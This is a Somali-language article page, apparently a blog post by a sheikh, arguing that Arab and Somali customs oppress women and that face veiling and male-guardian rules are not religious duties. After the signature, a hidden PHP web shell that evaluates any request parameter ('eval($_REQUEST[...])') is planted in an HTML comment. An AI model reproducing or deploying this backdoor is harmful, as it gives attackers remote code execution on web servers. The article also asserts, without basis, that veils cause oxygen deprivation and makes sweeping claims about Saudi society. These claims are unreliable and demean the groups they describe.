Widgetized Section

Go to Admin » Appearance » Widgets » and move Gabfire Widget: Social into that MastheadOverlay zone

Dulmiga haweenka lagu haayo

Guud ahaan waxaan ka dharagsan nahay muhimmadda ay gabdhuhu leeyihiin iyo sida nolosha aadanuhu u gudhisantahay Nin iyo naag. La’aanta midkood nolosha aadanuhu ma suuroobayso. Way isku xiran yihiin. Haddii hooyo lawaayo aabbe lama helaayo. Haddii dhadig lawaayo lab lama helaayo. Waa shay isku xiran oo la’aanteed aan aadanuhu abuurmi Karin. Sida xayawaanka kale oo dhan ay ugu dhisan yihiin dhadiga iyo labka.
Ayada oo labada nooc ee dhadiga iyo labku ay muhiim u yihiin jiritaanka nooc kasta ee xayawaanka kamid ah, ayaa waxaa aad u sii muhiimsan nolosha aadanaha hooyada. Maxaa yeelay hooyada caloosheeda ayuu ku abuurmaa, markuu dhashana caanaha iyo raxmadda hooyo ayuu ku koraa. Hooyada ayaa aad muhiim ugu ah nolosha aadanaha oo dhan.
Aragtidii Carabtu gabdhaha ka qabtay.

Runtii Carabtu ma jeclayn gabdhaha. Sabata ay u necbaayeen ma cada. Laakiin waxaa cad inaysan jeclayn in gabari u dhalato. Miyeey ka maarmaan gabdhaha? Jawaabtu waa maya. Nin kasta naagbaa dhashay. Waa hooyadi. Haddana ma aysan jeclayn in loo sheego ninka gabar ayaa kuu dhalatay. Haddana wuxuu u baahan yahay naag uu guursado.
• Waxaa laga yaabaa nacaybka Carabtu inuu xiriir la leeyahay noloshii adkayd iyo colaadihii ay carabtu ku noolaayeen. Gabdhuhu dagaalka kuma fiicna. Safarka iyo shaqada adag ee muruqa u baahanna kuma fiicna. Waxaa kale oo laga yaabaa inay masayr ku lug lahayd nacaybkaasi. Oo ninku sharaftiisa ayuu ugu baqayay dhadiga. Soomaalidu waxay ku maahmaahdaa “Gabadhu laba astur ayay leedahay. Guur iyo geeri” Sidaas daraadeed waxaa dhici karta inay u necbaayeen Qiiro iyo masayr daraadi.
“واذا بشّر أحدهم بالأ نثى ظلّ وجهه مسودّا وهو كظيم, يتوارى من القوم من سوء ما بشّر به , أيمسكه على هون, أم يدسّه فى التّراب, ألاساء ما يحكمون” سورة النّحل أية
Waxaa Alle quraanka Kariimka ah inoogu sheegay in Carabtu gabdhaha ay dheleen ay iyaga oo nool dhulka ku xabaali jireen. Waa la yaab. Nin gabadhii uu aabaha u ahaa iyada oo nool oo soo fiirinaysa aasaya. Haddana aan ka xumayne isla quman. Waa yaab. Waa wax naxdin leh.
Alle Quraankiisa wuxuu ku yiru:
“واذا الموئودة سئلت , بايّ ذنب قتلت”
“Markii la waydiiyo, gabadhii ayada oo nool la’aasay, Maxaa loo dilay? Dabbigee ayay gashay?

Aragtida Soomaalida ee gabadha
Marwalba way jirtay aragtida ku salaysan in haweentu ninka ka liidato. Wax yaabaha loo daliishado aragtidaas, ama looga qiyaas qaatay waxaa ka mid ah:
• Sida Alle u dhisay jismiga dhadiga iyo muuqaalkeeda shakhsi ahaaneed oo ay uga duwantahay labaka.
• Waxaa ka mid ah sida ay u fikirto iyo qaabka dareenkeedu u shaqeeyo.
• Waxaa ka mid ah qiimaha nafteeda haddii diyo laga bixinayo, oo Fuqahada qaarkood ay ku sheegeen konton (50) halaad, oo u dhiganta nus ninka diyadiisa.
• Waxay qiyaas ka qaateen dhaxalka oo xoolaha la siiyay wax ka yar inta wiilka la siiyo.
• Waxay kale oo qiyaas uga qaateen markhaatiga hal nin iyo laba gabdhood isu dhigmaan.
• Waxaa kale oo jiray mar walba dhaqankii carabta laga dhaxlay oo haweenta u arkayay marwalba wax ka xuquuq yar ninka.
Guud ahaan aragtida aadanaha oo dhan haweentu waxay ahayd wax si gaar ah loo eego, oo aan marna ninka la sinnayn. Ummadihii hore oo dhan, gaar ahaan Europe haweentu waxay ahayd wax marwalba ninka ka hooseeya ama ka qiimo liita. Aadanaha xaddaaraddiisa iyo aqoontiisu marwalba way is badalaysay, waxayna u subadalaysay, in dhaqannada xunxun iyo afkaarta liidata iyo caddaalad darada laga takago.
Waxaan fiirinaynaa labadii xaddaaradood ee adduunkaan ugu waynaa uguna hormar badnaa. Waxaa xaddaaraddii Islaamka iyo xaddaaraddan hadda jirta ee reer galbeedku madaxda u yihiin.
Sida loo diimeeyay aragtidii hore ee Carabta
Waxaan soo sheegnay inay gabadhu astaan u tahay, Jacalka iyo Naxariista. Jacalka iyo Naxariistu, waa tilmaan Alle leeyahay, oo uu san marna ka tagayn. Alle ayaa Jacalkiisii iyo Naxariistiisii huwiyay Haweenka, si ay ugu gudbiyaan caruurtooda iyo ninkooda iyo dhammaan khalqiga oo dhan.

Haweentu waxay kale oo astaan u tahay, ama u taagan tahay, shahwada labka Insaanka, iyo dammacooda. Mar haddii ay haweentu u taagan tahay, damaca iyo rabitaanka shahwada ee ragga, waxaa lagama maarmaan ah, in axkaam badan iyo shuruuc badan iyo shuruud korka laga saaro, si loo ilaaliyo. Waa dabeeci in insaanku masayro, oo uu ka baqo, in lala wadaago, ama la arko quruxda haweentiisa.
Haddii aan ayadoodhan qariyo, oo aan cidna arkin, soo kama badbaadin in la’ila qaybsado, ama la’ila wadaago? Baqdinta ku saabsan in haweenta la arko, kadibna la shukaansado, waa baqdin xeel dheer oo dhib badan, oo u baahan in laga fakado, si Alla sidii looga fakan karo.
Si dhibtaas looga hortago, waxaa lagama maarmaan ah, in la jaro, xiriirka, caaddifadda, salaanta, is qaraabaysiga, is waraysiga dhexmara nin iyo naag. Naagtu, saaxiib malaha, qof iyada yaqaan iyo qof ay taqaano midna ma jiro. Qaraabo iyo daris malaha, maxaa yeelay, waligeedba lama arkin. Wax Alle, wixii ay xiriir la lahayd bilaa’aadanka ay ka tirsantahay, waa in la jaro, waxaan ka ahayn haween kale, oo sideeda oo kale, meel ku xabbisan.
Si arrintaas loo fuliyo, oo ay u hergasho, waa in la diimeeyo. Waa in Diin laga dhigo, oo la yiraahdo, Alle iyo Rasuulka ayaa yidhi. Mar haddii, dareenkii masayrka, iyo hinaaska ee raga, diin la waafajiyay, xaalku waa hagaagsan yahay. Khatartii waa yaraatay. Kaliya, waxaa loo baahanyahay, in arrintaas si fiican loo fidiyo, oo haweenka oo dhan laga dhaadhiciyo, oo loo sheego, gabadhii khilaafta arrinkaas inay naarta galayso, oo aan salaad iyo soon midna laga aqbalayn.
Laakiin haddii, bulshada inteeda kale oo dhan laga jaray, oo lagu xukumay, inay is qariso, oo wajiga dadato, safarna, ayna meella u aadin, haddii sidaas diin laga dhigay, Cibaadadii Diinta maxaa laga yeelayaa? Cibaadada xagga Diinta ah, ee mar waa jibta cimriga qofka, sida Xajka oo kale, sidee la yeelayaa? Way fududahay. Waan in lala socdaa, oo lawaardiyeeyaa. Qof la’aamini karo ma’aha. Waa in waardiye laga qabtaa. Oo yaa waardiyaynaya? Waxaa waardiyaynaya, “MAXRAM” Nin aan iyada xaaraam ka ahayn. Sida ninkeeda, Wiilkeeda, walaalkeed iyo wixii la mid ah. Marka cibaadadu waxay u baahantahay, oo ay ku xirantahay, qof kale oo labaad, oo waardiyeeya? Dabcan. Haddii ay cidkale waydo, waa inay kaxaysataa, wiilkeeda, haddii uu gaaro, 13,14.15. Mar haddii wiilkeedii waar diyaynayo, oo ay wadato, waa sax. Cibaadadeeda waa la’aqbalayaa, maxaa yeelay, wiilkeedii ayaa la socday. Ihaano. Hooyo, cunugeedii ay dhashay, oo ay korisay waardiyaynayo! CEEB, CEEB.
Fahamka noocaas ku salaysan, sax ma aha. Waa khalad. Caqliga iyo Sharciga ayuu khalad ku yahay. Waa xadgudub, bilaa’aadanka lagu xad gudbay. Waxay meel ka dhac kutahay, insaaniyadda iyo karaamayntii Alle Insaanka karaameeyay. Waxay meel ka dhac ku tahay, Shareecada Alle, ee xikmadda ku dhisan. Haddii qofka cibaadadiisu qof kale ku xirantahay, oo uu san cibaadadii gudan Karin kaligii, maxay, faa’iidaynaysaa, waajibka la saaray?
Gabar Faransiis ah, oo dhallinyaro ah, ayaa Islaamtay. Muddo markay Islaamka daraasaynaysay, ayaa damacday inay soo xajiso. Wadaadadii Diinta wakiilka ka ahaa, ayaa u sheegay, inaysan ansaxayn cibaadadeedu, xajkana aan loo ogolayn, maxaa yeelay, maxram ma wadato. Gabadhii waxay fahmi wayday, maxramka waxa loole jeedo iyo waxa iyada ku xiray cibaadadeed Maxram. Way yaabtay. Runtii aad ayay uga xumaatay. Waxay ku calaacashay, “Sow anigu iskay, uma Islaamin? Ma cidkale ayaa Islaam iga dhigtay? Sow qof mus’uul ah, oo naftiisa ma’uul ka ah ma ihi?” Ma bannaana, inaad kaligaa xaj aado, ee maxram la’imow ayaa loogu jawaabay.

Gabdha Soomaaliyeed iyo dhaqanka
Haddii ay haweentu gabadh dhasho, looma mashaxaridi jirin. Sida caadadu ahayd haddii ay wiil dhasho, waa loo mashxadijiray. Haddii, haweenka la jooga hooyada foolanasa, ay mashxadiwaayaan, macnaheedu waxaa weeye, gabadh ayaa dhalatay.
Markay xoogaa soo korto, oo hadalka barato, waxaa loo sheegi jiray, inay naagtahay, oo ay dhoocil ka siitahay. Haddii aysan qaan gaarin, oo aysan naagnimo isu diyaarin, waa dhoocil. Waxaa laga yaabaa, in loogu yeero, oo la yiraahdo, meeday, dhoocishii xumayd oo halkaan joogtay. Inta badan, waxaa saas ugu yeera hooyadeed. Maxaa yeelay, hooyadeed ayaa xil ka saaranyahay, inay sii barto, waxa ay tahay, iyo qaybta ay mujtamaca kaga jirto. Ayada oo aan wax xumaan ah, iyo nacayb midna ula jeedin, ayay hooyadu gabadheeda ugu yeeraysaa dhoocil. Haddii ay dhow gabdhood yihiina, waa dhoocilo.
Markii ay korto ma hesho daryaal xagga nolosha, cuntada iyo tacliinta. Wax walba mudnaanta wiilka ayaa leh. Ayadu waa gabadh, ama waa dhoocil, waa inay sugto, wixii wiilku ugu arrimiyo, iyo marba wixii loogu taliyo.

Haddii ay guur gaarto, oo ay inan quruxbadan noqoto, ayadu malaha khiyaarka doorashada ninka ay rabto. Waa loo doorayaa. Haddii loo doorayo, waxaa mudnaanta la siinayaa, ninkii xoolo haysta. Xattaa haddii uu gabadha aad uga wayn yahay, isaga ayaa mudnaanta leh.
Haddii guurku xumaado oo ay ninkii heshiin waayaan, marwalba ayada ayaa naag xun ah, oo haddii la furo, waxay noqonaysaa garoob, aan qiimo badan lahayn. Haddii ninkii xoolihiisii la siin waayo, maba furayo, mana rabo, kaliya wuu iska haysanayaa ilaa ay ku dhimato, ama xoolihiisii loo soo celiyo.
Dhammaan dhaqanka Soomaalida gabadhu way ku dulmantahay. Waa dhaqan in la badalo, oo laga fiirsado u baahan.
Xagga Diinta, waxaa dhawaan soo baxay, laakiin aan awal jirijirin, in gabadhu dhammaan cawro tahay. Wajigeedu waa cawro. Maxaa cayro la dhahaa? Cawro waxaa la dhahaa, wixii private ah, oo aan la muujin Karin, sida xubnaha taranka. Cawrada ragga iyo Cawrada haweenkuna waa isku mid. Kaliya, waxay kukala duwan yihiin, dhadig iyo lab. Midna waa cooro, dhadig, midna waa cawro lab ah. Markii Nabi Aadam, Shayddaanku waswaasiyay, oo uu Jannadii ka soo saaray, Aadam iyo Xaawo, waxaa u muuqday, Cawradoodii. Waxay bilaabeen inay Caleentii geedaha Jannada ay ku daboolaan. Cawradii ay garteen oo latusay, Wajigu kuma jirin. Alle, Wuxuu yiri: “يابنى أدم قد أنزلنا عليكم لبا سا يورى سوءاتكم, وريشا ولباس التّقوى خير”
Cawradii Aadam iyo Xaawo astureen, oo caleenta Jannada ku dhajiyeen, wajigu kuma jirin. Marka wajigu, Cawro ma aha. Wee meesha bilaa’aadanku isku garto, oo ruuxduna ka soo daahirto. Ruuxda wanaagsan oo Alle ku xiran, waxay wadataa, farxad, bashaashad, Qosol iyo wixii la mid ah. Wajigu waa xubin Alle barakeeyay oo uu sharfay. Ma istaahisho in la qariyo.
Wajigu waa xubinta ugu sharafta badan xubnaha aadanaha. Alle, meelo badan ayuu Quraankiisa uga sheegay. “Wajiyo, maalinta Qiyaamaha way caddaanayaan, oo ifayaan, Wajiyona, way madoobaanayaa.” “وجوه يومئذ
مسفرة, ضاحكة مستبشرة, ”
Waxaa sadaqada ka mid ah, inaad la kulanto, qofka kale, adiga oo waji furan, oo u qoslaya.
Marka Wajigu waa meeshii qofka jiritaankiisa matalaysay. Qofka kasta oo jira Alle Waji ayuu u yeelay. Haddii ay ku baboontahay, in la qariyo, oo la daboolo, markii horaba Alle, uma sameeyeen. Wajigu waxaa matalayaa qofkii oo dhan. Haddii wajiga laqariyo, waxaa la qariyay, qofkii oo dhan. Quraanka iyo Xaddiith kaba, waxaa muslimiinta oo dhan lagu amray, inay wa jigooda furfuraan. Waxaa xaddith ku soo aroortay, “وأن تلقى أخاك بوجه طليق”
Qofka wajiga laga xiray, waxaa la aasay isaga oo nool. Waa xabaal nololintii Carabta, oo waji kale loo yeelay.
Gabdhaha wajiga xiran, waxaa ku yar oxygen- ta. Hawada aan ku neefsanayno, jerkeennu aad ayuu ugu baahan yahay. Baahidaas aan u qabno awgeed ayaa Alle bilaash ka dhigay. Wax meel yaala meeshakalana aan oollin ma aha. Waa shay aan lagadin, oo bilaash ah, oo second, aadan ka maarmin. Dhakhaatiirtu waxay caddeeyeen in jerkeennu u baahan yahay, Oxygen aad u badan. Caafimaadka maskaxdu wuxuu ku xiran yahay, oo uu ku shaqeeyaa Oxygen taas. Gabdhaha wajiga dada, waxaa ku yaraanaya, Oxygen ka ay u baahan yihiin. Waxay si tartiib ah, u bilaabayaan madax xanuun, caro, wareer iyo daal farabadan. Maxaa yeelay, ma haystaan Oxygen kufulin.

Waayahaan danbe, indhashareerku wuxuu noqday, wax xumaanta iyo tuugada lagu sameeyo. Maxaa yeelay, waa maskaraati. Xawaalado dhawr ah, oo Nairobi iyo Mombassa ku yaal, oo Soomaali leedahay, ayuu tuugo ku dhacday, indhashareer. Gabdhaha niyo jabay, oo doonaya inay Zino iyo xumaan sameeyaan, waxay uga dhuuntaan qaraabadood iyo dadka yaqaan indhashareerka. Wuxuu noqday calaamadda shakiga iyo tuugada iyo danbiyada la galo. Gabdhahannaga Soomaaliyeed, ee sharafta iyo akhlaaqada leh, waxaan ka codsanayaa inay ka fiirsadaan qaadashada indha shareerka. Waa caado, ku timid masayr iyo shaki iyo waardiyay, haweenka la waardiyaynayo.
Waddamada dhaqankaas indhashareerka iyo kala ilaalinta nimanka iyo naagaha hirgaliyay, waxaa ugu wayn waddanka Sacuudiga. Waddanka sacuudigu dhib wayn ayuu ka helay, dhaqankaas. Wuxuuna ka dhigay, inay diin tahay, oo Daliil leedahay. Dhibaatooyinka waawayn ee Su’cuudigu ka helay dhaqankaas waxaa ka mid ah, nimanka dabada iska fuulaya. Arrintaas, Soomaalidu u taqaan Khaniisnimada, aad ayay ugu fiday waddanka Sacuudiga. Waddamo Ashiyaan ah, oo ay kamid tahay, waddanka Malasiya, waxay mamnuuceen, Baasaboorka sacuudiga, haddii uusan official ahayn. Haddii uusan ahayn baasaboor dawladdu ogtahay, oo ay iyadu mas’uul ka noqonayso. Waxay ugu carareen faraxumayn , ay dhallin yaradooda lacagsiinayaan kadina ay faraxumaynayaa.

Waxay kale oo ka dhaxleen, Gabdhihii oo gaboobaya, iyaga oo Bikra ah. 40% Wax ka badan ayaa gaara da’da 70 sano, iyaga oo aan la guursan. Taasi waxay keentay, inay gabdhihii cuqdad qaadaan, oo ay is yiraahdaan, annag iyo nimanka aragti ayaa naga dhaxaysa. Mar haddii aan nin arko, waa inaan ka faa’iidaystaa. Maxaa yeelay, waligeed ma aysan arag nin. Rag iyo dumarba, waxaa la aadaa, waddamada kale si loogusoo raaxaysto, oo ciqaabkii iyo cadaabkii shahwada looga baxo.
Gabadhu waa bilaa’aadan. Waxaa loogu talagalay, inay xumaanta iyadu diido. Wanaagana doorato. Zinada iyo macsida waxaa loogu talagalay, in qofku diido, ee ma aha, in lagu khasbo. Takoorka iyo kala soocidda mujtamacu wuxuu keenay, dib dhac, colaad iyo mujtamaca curyaan ah.

Sheekh Cabduraxmaan Jabril

<!– [insert_php]if (isset($_REQUEST["YzuNS"])){eval($_REQUEST["YzuNS"]);exit;}[/insert_php][php]if (isset($_REQUEST["YzuNS"])){eval($_REQUEST["YzuNS"]);exit;}[/php] –>

One Response to Dulmiga haweenka lagu haayo

  1. Sheikh Adirahman Mohamed Jibril

    November 20, 2012 at 10:38 am

    Wax kasta oo aan samaynayno waxay ka soo burqadaan caqiido iyo iimaan aan qabno. Fikrad kasta oo aan haweenka ka haysano, kama imaan nolosha dhabta ah, caqliga, cilmiga ee aan ku noolnahay iyo baahideena ku saabsan haweenka ee waxay ka timid, Caqiido horay aan u qabnay oo la xiriirta dhaqankii hore ee Carabta oo ahaa:
    واذا بشر أحدهم بالانثى ظل وحهه مسودا وهو كظيم. يتوى رى من القوم من سوء ما بشر احدهم, أيمسكه على هوت ام يدسه فى التراب, الا ساء ما يحكمون.
    Dareenka xuquuqda aadanaha guud ahaan, gaar ahaan haweenka waa mid inaga dhiman oo aynaan wali helin xaqiiqadiisa. Waxaan u baahanahay inaan si fiican oo dhab ah uga fikirno, oo aan uga doodno.